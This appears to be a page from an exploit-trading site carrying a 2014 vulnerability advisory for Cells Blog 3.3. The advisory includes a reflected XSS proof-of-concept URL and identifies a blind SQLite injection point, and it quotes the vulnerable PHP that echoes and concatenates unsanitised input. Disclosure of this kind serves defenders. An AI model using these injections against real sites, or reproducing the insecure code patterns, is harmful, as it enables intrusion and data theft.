0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection Vulnerabilities
################################################################ [+] Exploit: Cells v3.3 XSS Reflected & Blind SQLite Injection # [+] Author: vinicius777 # [+] Contact: vinicius777 [AT] gmail @vinicius777_ # [+] version: Cells Blog 3.3 # [+] Vendor Homepage: http://cells.tw # ################################################################ [+] 14/01/2014 vendor contacted [+] 17/01/2014 no response from vendor [+] 20/01/2014 no response from vendor [+] 21/01/2014 Published [1] Reflective XSS on 'msg=' PoC: http://localhost/cells-v3-3/errmsg.php?msg= [%3C%2Fp%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cp%3E] Vulnerable Code: [+] errmsg.php <? echo "<img src='images/error.gif'>"; if (isset($_GET["msg"])){$msg=$_GET["msg"];}else{$msg="";} if ($msg!=""){ echo "<br><br><br>".$msg; }else{ echo "<br><br><br>You may key in something wrong.<br>Please try it again! ..... "; echo " If you always got this message, <br>please send a <a href='pub_pubmsg.php?bgid=1'>".$face_report."</a>"; echo " to the web master."; } ?> [2] Blind SQLite Injection on 'pcid' PoC: http://localhost/cells-v3-3/user.php?pcid= [SQLite Injection] Vulnerable Code: [+] user.php if($_GET["pcid"]!=""){ $sql="select * from users where cdt='n' and pcid=".$_GET["pcid"]; # # # Greetz to g0tm1lk and TheColonial. # 0day.today [2024-11-15] #